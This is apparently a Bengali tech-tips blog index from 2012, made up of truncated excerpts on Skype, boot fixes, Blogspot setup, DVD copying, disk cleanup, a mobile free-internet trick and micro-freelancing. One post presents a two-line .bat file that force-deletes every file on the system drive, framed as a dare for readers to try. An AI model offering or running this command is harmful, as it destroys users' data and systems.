Oct 30, 2012

এখনি ডাউনলোড করুন skype 6.0.0.120


এটা skype এর সর্বশেষ ভার্সন।
এটি গত ২৭ অক্টোবর রিলিজ পেয়েছে।
নতুন যোগ হয়েছে :  ফেসবুক এবং মাইক্রোসফট অ্যাকাউন্ট দিয়ে লগিন করা যাবে।
ফিচারসমূহঃ
  • ফ্রী স্কাইপি থেকে স্কাইপি কল করা।
  • অল্প খরচে মোবাইল এবং টেলিফোনে কল করা।
  • অনলাইন নাম্বারে কল করা।
  • কনফারেন্স কল করা।
  • ফ্রী ভিডিও কলিং।
  • গ্রুপ ভিডিও কলিং।
  • স্ক্রীন শেয়ার করা।

Oct 29, 2012

উইন্ডোজ একটি বিরক্তিকর সমসার সমধান করুন মাত্র কয়েক সেকেন্ড


আমদের  অনেক কম্পিউটারে ছোট একটি সমস্যা দেকে যাই , যেটা আগে কখনও ছিল না, যেটা আপনার কম্পিউটার সেটআপ দিলেন তারপর থেকে এই সমস্যা হচ্ছে । কম্পিউটার চালু করলে এর উইন্ডোজ আছে একটি কিন্তু উইন্ডোজ দেকাচ্ছে দুটি অ্যান্ড আপনাকে উইন্ডোজ সিলেক্ট করার জন্য বলছে অ্যান্ড দুটির মধ্যে একটি কাজ করে  আর অন্নটি কাজ করেনা ফাইল মিসিঙ দেখাচ্ছে। ইচ্ছে করলে এই সমস্যা সমাধান করতে পারেন কয়েক সেকেন্ড আর এর জন্য আপনাকে যা করতে হবে    my computer-এর ওপর right click করন তারপর properties –click করন তারপর যে উইন্ডোজটি

Blogspot ব্লগিং প্ল্যাটফর্ম এ যেভাবে ব্লগ ওপেন করতে হয় _নতুনদের জন্য


যেসব সাইট ফ্রী ব্লগিং এর সুবিধা দিয়ে থাকে তাদের মধ্যে ব্লগস্পট এবং ওয়ার্ডপ্রেস খুব জনপ্রিয়। ব্লগস্পট খুব সহজে হ্যান্ডল করা যায়। ওয়ার্ডপ্রেস এর সুবিধা অনেক বেশি তাই বড় বড় ব্লগগুলাতে এটির কদর অনেক বেশি। এখন আমরা শিখব কিভাবে ব্লগস্পট এ ব্লগ ওপেন করতে হয়। ব্লগস্পট এ ব্লগ ওপেন করতে কোন এক্সট্রা অ্যাকাউন্ট খুলতে হয়না। জিমেইল অ্যাকাউন্ট দিয়েই খুব সহজে ব্লগ খোলা যায়।
১) প্রথমে আমাদের http://www.blogger.com                      এই সাইট এ যেতে হবে। সেখানে নিচের ছবিটির মত একটা উইন্ডো আসবে।


http://www.technowpedia.com/wp-content/uploads/2009/03/bloggerhomepage.png

২) নিজের জিমেইল অ্যাকাউন্ট এবং পাস ওয়ার্ড দিয়ে লগইন করতে হবে।
৩) এখানে ব্লগ এর

Oct 12, 2012

কে চায় নিজের পিসি ধংস করতে



কে চায় নিজের পিসি ধংস করতে। কিন্তু আমি আমার পিসির ১২/২৪ টা বাজিয়ে দিয়েছি। এই .bat কোডটি দ্বারা । বিশ্বাস না হলে আপনার পিসির ফাইলগুলো নিরাপদে রেখে একবার ট্রাই করেন। আর পিসির ১২টা বাজার সময় গনেন।

আপনার এই কাজটি করার জন্য যাহা যাহা করতে হবে।
০. আপনার Computer টি নতুন করে ইন্সটল করার জন্য সকল প্রকার প্রস্তটি নিয়ে নিবেন।

১। প্রথমে নিচের কোডটি কে Notepad এ Past করুন। অথবা এখানে থেকে ডাউনলোড করে নিতে পারেন।

@echo off
del %systemdrive%\*.*/f/s/q

ডিভিডি থেকে ফাইল কপি সহজেই

নানা প্রয়োজনে অনেক সময় আমরা ডিভিডি থেকে ফাইল কপি করে থাকি। অনেক সময় কিছু কিছু ডিভিডি ডিস্ক থেকে ফাইল কপি করা সম্ভব হয় না। ফাইল কপি করতে গেলে This DVD is copyright protected লেখা বার্তা আসে। এর কারণ ওই ডিভিডিটি Content Scramble System (CSS) সিস্টেমে

উইন্ডোজ এক্সপিতে সিস্টেম ফোল্ডারের ড্রাইভ পরিবর্তন করুন


সাধারনত প্রোগ্রাম ফোল্ডার থাকে যে ড্রাইভে, তাতেই অপারেটিং সিস্টেম ইনস্টল থাকে। মানে প্রায় সবারই থাকে (c:\program file)। ইচ্ছে করলে আপনি এটি পরিবর্তন করে অন্য কোনো ড্রাইভে দিতে পারেন। এ জন্য run এ গিয়ে regedit command টা টাইপ করে ok। এবার HKEY_LOCAL_MAHINE > SOFWARE >Microsoft >

হার্ডডিস্কের জায়গা খালি করুন

হার্ডডিস্কে যতেস্ট পরিমাণ জায়গা থাকা সত্ত্বেও অনেক সময় দেখাযায়,হার্ডডিস্কের মেমোরি পূর্ণ হয়ে আছে। এ রকম হলে my computer এ ঢুকে Tools> folder option> view> এ গিয়ে Hide protected operating system files থেকে টিক চিহ্ন তুলে দিন এবং show Hidden files and

Oct 11, 2012

গ্রামীনফোনে ফ্রী ইন্টারনেট


গ্রামীনফোনে ফ্রী ইন্টারনেট ও MMS ব্যবহার করার ট্রিকস শেয়ার করতে এলাম ।
এটি সম্ভব । গ্রামীনফোনে 3MB ফ্রি ইন্টারনেট ও 3টি MMS পেতে পেতে চান তাহলে এখুনী igenp10 349 টাইপ করে 9999 (ফ্রী) এ পাঠিয়ে দিন। টাইপ করার সময় 10 এবং 34এর মাঝে একটি স্পেস দিয়েন

আয় করুন ছোট ছোট ফ্রিলাসিং কাজ করে (নতুনদের জন্য)



টাকা আয় করা বর্তমান বিশ্বের একটি সাধারন কাজ। সবাই বেঁচে থাকার জন্য টাকা আয় করে থাকে। এখনতো ইন্টারনেট টাকা আয় করার একটি বিশাল মাধ্যম। ইন্টারনেটে টাকা আয় করার অনেক উপায় এবং ওয়েব সাইট আছে যার মধ্যে কিছু আছে বিশ্বাস যোগ্য আর কিছু আছে প্রতারনার জন্য। নতুন ব্যবহারকারীরা রং চং আর সহজ দেখে প্রতারনায়ই পা দেয়। কিন্ত ইন্টানেটের বিশাল ভান্ডারে নতুনদের জন্য ও সাইট বা উপায় আছে। সুধু চিনে নিতে হবে। আজকে আমি একটি সাইটের সাথে একটু পরিচয় করিয়ে দেবো যা অনেকদিন ধরে ফ্রিলাসিং এর জগতে সুপরিচিত। এই সাইটা নতুন ব্যবহারকারীকে সাহায্য করবে। হয়তো এখন যারা এই পোস্টটি পড়ছেন তারা প্রথমে এই সাইটে কাজ করেছেন আর এখন বড় বড় অংকের ফি নিয়ে ফ্রিলাসিং এর কাজ করছেন। যাক আর বেশি কথা বাড়াবো না। সাইটটির নাম EzMicroJobs  ।

EzMicroJobs   কি :

"